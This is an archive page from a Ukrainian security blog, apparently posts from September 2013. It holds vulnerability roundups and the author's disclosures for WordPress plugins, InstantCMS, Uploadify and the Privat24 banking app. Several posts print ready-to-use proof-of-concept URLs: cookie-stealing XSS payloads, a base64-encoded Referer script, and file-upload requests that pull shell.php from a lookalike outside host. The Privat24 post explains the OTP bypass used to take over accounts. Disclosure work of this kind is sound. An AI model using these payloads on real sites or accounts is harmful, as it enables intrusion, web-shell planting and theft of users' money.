Архів для категорії 'Уразливості'

Добірка уразливостей

17:22 21.09.2013

В даній добірці уразливості в веб додатках:

  • QNAP Turbo NAS Multiple Vulnerabilities (деталі)
  • Apache OFBiz Nested expression evaluation allows remote users to execute arbitrary UEL functions in OFBiz (деталі)
  • Apache OFBiz XSS vulnerability in the “View Log” screen of the Webtools application (деталі)
  • Easy Blog by JM LLC - Multiple Vulnerabilities (деталі)
  • EMC AlphaStor Buffer Overflow Vulnerability (деталі)

Уразливості в плагінах для WordPress №117

23:52 19.09.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах silverOrchid, Encrypted Blog та Wordfence. Для котрих з’явилися експлоіти. silverOrchid - це тема движка, Encrypted Blog - це плагін для шифрування блогу, Wordfence - це секюріті плагін для WordPress. Раніше я вже знаходив уразливості в Wordfence Security і пропонував розробнику провести аудит його плагіна, але він відмовився, тому зовсім не дивні повідомлення про нові уразливості в цьому плагіні.

  • WordPress silverOrchid Cross Site Scripting (деталі)
  • WordPress Encrypted Blog 0.0.6.2 XSS / Open Redirect (деталі)
  • WordPress Wordfence 3.8.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в RokIntroScroller і RokMicroNews для WordPress

16:22 19.09.2013

Торік я писав про численні уразливості в Rokbox для WordPress. А минулого тижня я виявив численні уразливості в плагінах RokIntroScroller і RokMicroNews для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості.

Стосовно плагінів для WordPress раніше я писав про уразливості в RokStories і RokNewsPager.

В цих плагінах для WordPress використовуються TimThumb (окрім Rokbox, розробники включили його в інші свої плагіни). Тому вони мають всі дірки TimThumb, які я оприлюднив ще в 2011 році.

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

А також FPD, Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://flickr.com.site.com/shell.php
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://flickr.com.site.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
http://site/wp-content/plugins/wp_rokmicronews/rokmicronews.php

Вразливі RokIntroScroller 1.8 і попередні версії та RokMicroNews 1.5 і попередні версії. А до останньої FPD вразливі всі версії плагінів RokIntroScroller та RokMicroNews.

Численні уразливості в RokStories і RokNewsPager для WordPress

23:58 18.09.2013

Торік я писав про численні уразливості в Rokbox для WordPress. А минулого тижня я виявив численні уразливості в плагінах RokStories і RokNewsPager для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості.

Стосовно плагінів для WordPress раніше я писав про уразливості в WPtouch і WPtouch Pro.

В цих плагінах для WordPress використовуються TimThumb (окрім Rokbox, розробники включили його в інші свої плагіни). Тому вони мають всі дірки TimThumb, які я оприлюднив ще в 2011 році.

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

А також FPD, Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://flickr.com.site.com/shell.php
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://flickr.com.site.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokstories/rokstories.php
http://site/wp-content/plugins/wp_roknewspager/roknewspager.php

Вразливі RokStories 1.25 і попередні версії та RokNewsPager 1.17 і попередні версії. А до останньої FPD вразливі всі версії плагінів RokStories та RokNewsPager.

Уразливості в InstantCMS

23:59 17.09.2013

17.07.2013

У липні, 14.07.2013, я знайшов Cross-Site Scripting та Redirector уразливості в InstantCMS. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

17.09.2013

Cross-Site Scripting (WASC-08):

GET запит до http://site/modules/mod_template/set.php з вказанням заголовку Referer.

Referer: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Redirector (URL Redirector Abuse) (WASC-38):

GET запит до http://site/modules/mod_template/set.php з вказанням заголовку Referer.

Referer: http://websecurity.com.ua

Вразливі InstantCMS 1.10.2 та попередні версії.

Дані уразливості досі не виправлені.

Добірка уразливостей

16:23 17.09.2013

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №116

23:56 14.09.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах VideoWhisper, Post-Gallery та Simple Login Registration. Для котрих з’явилися експлоіти. VideoWhisper - це плагін для трансляції відео, Post-Gallery - це плагін для створення галерей, Simple Login Registration - це форма реєстрації та логіна.

  • WordPress Video Whisper Cross Site Scripting (деталі)
  • WordPress Post-Gallery Cross Site Scripting (деталі)
  • WordPress Simple Login Registration 1.0.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливість в Приват24 для Android та iOS

22:45 13.09.2013

06.06.2013

У березні, 14.03.2013, я знайшов уразливості в Privat24 для Android та iOS. Але про ці уразливості я розповім трохи згодом (ПриватБанк все ще відмовляється їх виправляти, після багатьох місяців роздумів над цими уразливостями, і я все ще продовжую переконувати ПБ в необхідності їх виправлення). А зараз розповім про нову уразливість, що я виявив сьогодні. Це Insufficient Process Validation уразливість, що дозволяє обійти OTP в Приват24 для Android. Перевіряв у цій версії, а пізніше підтвердив те саме у версії для iOS.

Про що вже повідомив розробникам системи. Бо ця уразливість дозволяє легко отримати доступ до акаунтів користувачів (при наявності номера телефону і статичного пароля, без введення OTP) та викрасти їх гроші. На що ПБ відповів, що вони в курсі цієї проблеми і працюють над нею. Але як я перевірив на наступний день, вони досі не виправили цієї уразливості.

Детальна інформація про уразливість з’явиться після її виправлення. Спочатку дам ПриватБанку можливість її виправити.

13.09.2013

Враховуючи, що більше трьох місяців ПриватБанк не може виправити дану уразливість в мобільній версії Приват24, то я оприлюднюю її деталі. При тому, що після мого повідомлення 06.06.2013, за цей час я ще декілька разів нагадував ПБ про цю уразливість. Більше схоже, що банк просто не хоче цього роботи, вважаючи новий алгоритм роботи мобільного Приват24 “більш зручним” для користувачів (за рахунок погіршення безпеки).

Insufficient Process Validation (WASC-40):

При вході в Приват24 через клієнти для Android та iOS не запитується OTP (як це було до червня цього року). Тобто без підтвердження одноразовим паролем, який приходить по SMS, можна увійти в акаунт - на відміну від веб сайта Приват24, де OTP завжди запитується і цей функціонал нормально працює увесь час.

Єдиний раз, коли смс-ка з OTP приходить - це на новому пристрої, для прив’язки його до акаунту. Після цього більше жодних OTP не приходить. Це можна обійти або при доступі до телефону чи плантшету жертви або використовуючи першу уразливість, зі знайдених мною в Приват24 раніше. Що цікаво, від одного клієнта ПриватБанка я дізнався, що на початку червня (коли виникла ця проблема), був невеликий період часу, коли в Приват24 можна було входити навіть без паролю, лише запустивши мобільний додаток.

Таким чином для атаки потрібно лише знати логін і статичний пароль користувача Приват24. Які можна отримати за допомогою вірусу на мобільному пристрої, або за допомогою вірусу на персональному комп’ютері, або через фішинг атаку в Інтернеті. Фішинг атаку можна зробити як на окремому сайті, так і через XSS уразливості на будь-яких сайтах ПБ, приклад подібної атаки я навів 08.02.2008 в своїй доповіді про Інтернет безпеку. Якщо через веб сайт у Приват24 не зайдеш без OTP, знаючи лише логін і пароль, то це можна зробити через мобільні додатки Приват24.

Перевірено в Privat24 3.27.2 для Android та Privat24 4.8.6 для iOS.

Дана уразливість досі не виправлена.

P.S.

Розмістив демонстраційне відео Vulnerability in Privat24.

AFU, AFD та XSS уразливості в Uploadify

23:54 12.09.2013

12.06.2013

У квітні, 14.04.2013, я знайшов Arbitrary File Uploading, Arbitrary File Deletion та Cross-Site Scripting уразливості в Uploadify. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

12.09.2013

Arbitrary File Uploading (WASC-31):

Uploadify AFU.html

Code Execution атака через AFU.

Arbitrary File Deletion (WASC-42):

Uploadify AFD.html

Cross-Site Scripting (WASC-08):

Uploadify XSS.html

Uploadify XSS-2.html

Друга атака проводиться через XSS код в розширенні файла. Вона може бути проведена на Linux/Unix системах, де кутові дужки можна використовувати в іменах файлів, або через підробку заголовків.

Вразливі Uploadify v2.1.4 та потенційно інші версії. Зокрема версія в aCMS. Версії Uploadify 3.x не вразливі.

Добірка уразливостей

16:04 11.09.2013

В даній добірці уразливості в веб додатках:

  • JBoss AS Administration Console - Password Returned in Later Response (деталі)
  • Multiple vulnerabilities in Open-Xchange (деталі)
  • Voice Logger astTECS - bypass login & arbitrary file download (деталі)
  • Verax NMS Password Disclosure (деталі)
  • Verax NMS Hardcoded Private Key (деталі)